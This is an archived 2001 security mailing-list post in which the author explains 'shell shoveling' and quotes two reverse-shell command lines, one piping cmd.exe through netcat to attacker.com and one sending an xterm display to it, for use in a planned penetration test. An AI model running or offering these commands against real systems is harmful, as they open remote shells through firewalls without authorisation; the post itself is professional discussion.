-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Have you guys ever heard of shell shoveling? In playing with NetCat and reading an infoworld article, I came across a couple of concepts that I found fascinating. Below are the explanations and command lines: "If the attacker machine is listening with netcat on TCP 80 and 25, and TCP 80 is allowed inbound and 25 outbound to/from the victim through the firewall, then this command "shovels" a remote command shell from victim to attacker.com." nc attacker.com 80 | cmd.exe | nc attacker.com 25 "If Xterm (TCP 6000) is allowed outbound without restriction, then the following command would be a nifty Unix equivalent to the above example:" xterm -display attacker.com:0.0 & I am planning on using this in an upcomint p.t. and wanted to gain your insights! Thanks! -----BEGIN PGP SIGNATURE----- Version: PGPfreeware 7.0.3 for non-commercial use <http://www.pgp.com> iQA/AwUBO7oEDKlk83sSWEI4EQJT5gCgoed9mdrH4FMkU1vse5zBg1fkiqcAnAsv 0Em+lFGcjjX00Jd6eTEGSSFw =BUzY -----END PGP SIGNATURE----- ---------------------------------------------------------------------------- This list is provided by the SecurityFocus Security Intelligence Alert (SIA) Service. For more information on SecurityFocus' SIA service which automatically alerts you to the latest security vulnerabilities please see: https://alerts.securityfocus.com/
This archive was generated by hypermail 2b30 : Tue Oct 02 2001 - 12:00:08 PDT